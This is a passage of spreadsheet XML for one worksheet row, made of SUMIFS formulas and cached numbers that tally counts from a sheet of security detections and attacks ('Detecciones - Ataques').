        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Y27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Y27 &amp; "*") </f>
        <v>427</v>
      </c>
      <c r="Z59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,Z27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; Z27 &amp; "*") </f>
        <v>270918</v>
      </c>
      <c r="AA59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AA27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AA27 &amp; "*") </f>
        <v>431</v>
      </c>
      <c r="AB59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AB27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AB27 &amp; "*") </f>
        <v>275</v>
      </c>
      <c r="AC59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AC27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AC27 &amp; "*") </f>
        <v>78</v>
      </c>
      <c r="AD59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AD27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AD27 &amp; "*") </f>
        <v>3410</v>
      </c>
      <c r="AE59" s="353">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AE27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AE27 &amp; "*") </f>
        <v>55</v>
      </c>
      <c r="AF59" s="354">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,AF27) + SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; AF27 &amp; "*") </f>
        <v>6486</v>
      </c>
      <c r="AG59" s="271"/>
      <c r="AH59" s="352" t="s">
        <v>2525</v>
      </c>
      <c r="AI59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AI27)</f>
        <v>28617</v>
      </c>
      <c r="AJ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AJ27)</f>
        <v>1</v>
      </c>
      <c r="AK59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AK27)</f>
        <v>11</v>
      </c>
      <c r="AL59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AL27)</f>
        <v>0</v>
      </c>
      <c r="AM59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AM27)</f>
        <v>27776</v>
      </c>
      <c r="AN59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AN27)</f>
        <v>0</v>
      </c>
      <c r="AO59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AO27)</f>
        <v>0</v>
      </c>
      <c r="AP59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AP27)</f>
        <v>0</v>
      </c>
      <c r="AQ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AQ27)</f>
        <v>112</v>
      </c>
      <c r="AR59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AR27)</f>
        <v>9</v>
      </c>
      <c r="AS59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AS27)</f>
        <v>0</v>
      </c>
      <c r="AT59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AT27)</f>
        <v>4</v>
      </c>
      <c r="AU59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AU27)</f>
        <v>14</v>
      </c>
      <c r="AV59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AV27)</f>
        <v>4</v>
      </c>
      <c r="AW59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AW27)</f>
        <v>0</v>
      </c>
      <c r="AX59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AX27)</f>
        <v>37</v>
      </c>
      <c r="AY59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AY27)</f>
        <v>0</v>
      </c>
      <c r="AZ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,AZ27)</f>
        <v>4</v>
      </c>
      <c r="BA59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BA27)</f>
        <v>29</v>
      </c>
      <c r="BB59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BB27)</f>
        <v>0</v>
      </c>
      <c r="BC59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BC27)</f>
        <v>49455</v>
      </c>
      <c r="BD59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BD27)</f>
        <v>0</v>
      </c>
      <c r="BE59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BE27)</f>
        <v>1</v>
      </c>
      <c r="BF59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BF27)</f>
        <v>3</v>
      </c>
      <c r="BG59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BG27)</f>
        <v>1</v>
      </c>
      <c r="BH59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BH27)</f>
        <v>396</v>
      </c>
      <c r="BI59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BI27)</f>
        <v>1</v>
      </c>
      <c r="BJ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BJ27)</f>
        <v>2</v>
      </c>
      <c r="BK59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BK27)</f>
        <v>27</v>
      </c>
      <c r="BL59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BL27)</f>
        <v>2</v>
      </c>
      <c r="BM59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BM27)</f>
        <v>155299</v>
      </c>
      <c r="BN59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BN27)</f>
        <v>115617</v>
      </c>
      <c r="BO59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BO27)</f>
        <v>0</v>
      </c>
      <c r="BP59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BP27)</f>
        <v>0</v>
      </c>
      <c r="BQ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BQ27)</f>
        <v>205</v>
      </c>
      <c r="BR59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BR27)</f>
        <v>0</v>
      </c>
      <c r="BS59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BS27)</f>
        <v>11</v>
      </c>
      <c r="BT59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BT27)</f>
        <v>3</v>
      </c>
      <c r="BU59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BU27)</f>
        <v>0</v>
      </c>
      <c r="BV59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BV27)</f>
        <v>0</v>
      </c>
      <c r="BW59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BW27)</f>
        <v>10</v>
      </c>
      <c r="BX59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BX27)</f>
        <v>0</v>
      </c>
      <c r="BY59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BY27)</f>
        <v>43</v>
      </c>
      <c r="BZ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,BZ27)</f>
        <v>133</v>
      </c>
      <c r="CA59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CA27)</f>
        <v>0</v>
      </c>
      <c r="CB59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CB27)</f>
        <v>4</v>
      </c>
      <c r="CC59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CC27)</f>
        <v>0</v>
      </c>
      <c r="CD59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CD27)</f>
        <v>1</v>
      </c>
      <c r="CE59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CE27)</f>
        <v>0</v>
      </c>
      <c r="CF59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CF27)</f>
        <v>7</v>
      </c>
      <c r="CG59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CG27)</f>
        <v>1</v>
      </c>
      <c r="CH59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CH27)</f>
        <v>8</v>
      </c>
      <c r="CI59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CI27)</f>
        <v>33</v>
      </c>
      <c r="CJ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CJ27)</f>
        <v>0</v>
      </c>
      <c r="CK59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CK27)</f>
        <v>16</v>
      </c>
      <c r="CL59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CL27)</f>
        <v>0</v>
      </c>
      <c r="CM59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CM27)</f>
        <v>180</v>
      </c>
      <c r="CN59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CN27)</f>
        <v>0</v>
      </c>
      <c r="CO59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CO27)</f>
        <v>20</v>
      </c>
      <c r="CP59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CP27)</f>
        <v>51</v>
      </c>
      <c r="CQ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CQ27)</f>
        <v>7</v>
      </c>
      <c r="CR59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CR27)</f>
        <v>0</v>
      </c>
      <c r="CS59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CS27)</f>
        <v>3379</v>
      </c>
      <c r="CT59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CT27)</f>
        <v>4</v>
      </c>
      <c r="CU59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CU27)</f>
        <v>0</v>
      </c>
      <c r="CV59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CV27)</f>
        <v>6</v>
      </c>
      <c r="CW59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CW27)</f>
        <v>0</v>
      </c>
      <c r="CX59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CX27)</f>
        <v>21</v>
      </c>
      <c r="CY59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CY27)</f>
        <v>35</v>
      </c>
      <c r="CZ59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,CZ27)</f>
        <v>0</v>
      </c>
      <c r="DA59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DA27)</f>
        <v>0</v>
      </c>
      <c r="DB59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DB27)</f>
        <v>0</v>
      </c>
      <c r="DC59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DC27)</f>
        <v>0</v>
      </c>
      <c r="DD59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DD27)</f>
        <v>7</v>
      </c>
      <c r="DE59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DE27)</f>
        <v>13</v>
      </c>
      <c r="DF59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DF27)</f>
        <v>0</v>
      </c>
      <c r="DG59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DG27)</f>
        <v>0</v>
      </c>
      <c r="DH59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DH27)</f>
        <v>929</v>
      </c>
      <c r="DI59" s="355">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DI27)</f>
        <v>5511</v>
      </c>
      <c r="DJ59" s="356">
        <f>SUMIFS('(B) - Detecciones - Ataques'!$GD3:$GD139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$E$3:$E$139,DJ27)</f>
        <v>17</v>
      </c>
      <c r="DK59" s="271"/>
      <c r="DO59" s="279"/>
      <c r="DP59" s="271"/>
      <c r="DQ59" s="271"/>
      <c r="DR59" s="271"/>
      <c r="DS59" s="271"/>
      <c r="DT59" s="271"/>
      <c r="DU59" s="271"/>
      <c r="DV59" s="271"/>
      <c r="DW59" s="271"/>
      <c r="DX59" s="271"/>
      <c r="DY59" s="271"/>
      <c r="DZ59" s="271"/>
      <c r="EA59" s="271"/>
      <c r="EB59" s="271"/>
      <c r="EC59" s="271"/>
      <c r="ED59" s="280"/>
      <c r="EG59" s="279"/>
      <c r="EH59" s="271"/>
      <c r="EI59" s="358" t="s">
        <v>357</v>
      </c>
      <c r="EJ59" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!AY$3:AY$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S36 &amp; "*")</f>
        <v>1</v>
      </c>
      <c r="EK59" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!CK$3:CK$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S36 &amp; "*")</f>
        <v>5</v>
      </c>
      <c r="EL59" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!EA$3:EA$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S36 &amp; "*")</f>
        <v>9</v>
      </c>
      <c r="EM59" s="359">
        <f>SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$B$3:$B$139,$EI38,'(B) - Detecciones - Ataques'!$GS$3:$GS$139,"✔") + SUMIFS('(B) - Detecciones - Ataques'!FQ$3:FQ$139,'(B) - Detecciones - Ataques'!$IS$3:$IS$139,"✔",'(B) - Detecciones - Ataques'!$C$3:$C$139,"*" &amp; $S36 &amp; "*")</f>
        <v>11</v>
      </c>
      <c r="EN59" s="360">
        <f t="shared" si="37"/>
        <v>11</v>
      </c>
      <c r="EO59" s="364"/>
      <c r="EP59" s="456">
        <f t="shared" si="40"/>
        <v>0.1964285714</v>
      </c>
      <c r="EQ59" s="457">
        <f t="shared" si="41"/>
        <v>0.8035714286</v>
      </c>
      <c r="ER59" s="427">
        <f t="shared" si="42"/>
        <v>0.6666666667</v>
      </c>
      <c r="ES59" s="427">
        <f t="shared" si="43"/>
        <v>0.6153846154</v>
      </c>
      <c r="ET59" s="427">
        <f t="shared" si="48"/>
        <v>0.6666666667</v>
      </c>
      <c r="EU59" s="475"/>
      <c r="EV59" s="358" t="s">
        <v>664</v>
      </c>
      <c r="EW59" s="465">
        <f t="shared" ref="EW59:EZ59" si="53">IF(EJ37=0,"-",EJ58/EJ37)</f>
        <v>0.2</v>
      </c>
      <c r="EX59" s="465">
        <f t="shared" si="53"/>
        <v>0.15</v>
      </c>
      <c r="EY59" s="465">
        <f t="shared" si="53"/>
        <v>0.2</v>
      </c>
      <c r="EZ59" s="466">
        <f t="shared" si="53"/>
        <v>0.09230769231</v>
      </c>
      <c r="FA59" s="476"/>
      <c r="FM59" s="477"/>
      <c r="FY59" s="379" t="s">
        <v>310</v>
      </c>
      <c r="FZ59" s="454">
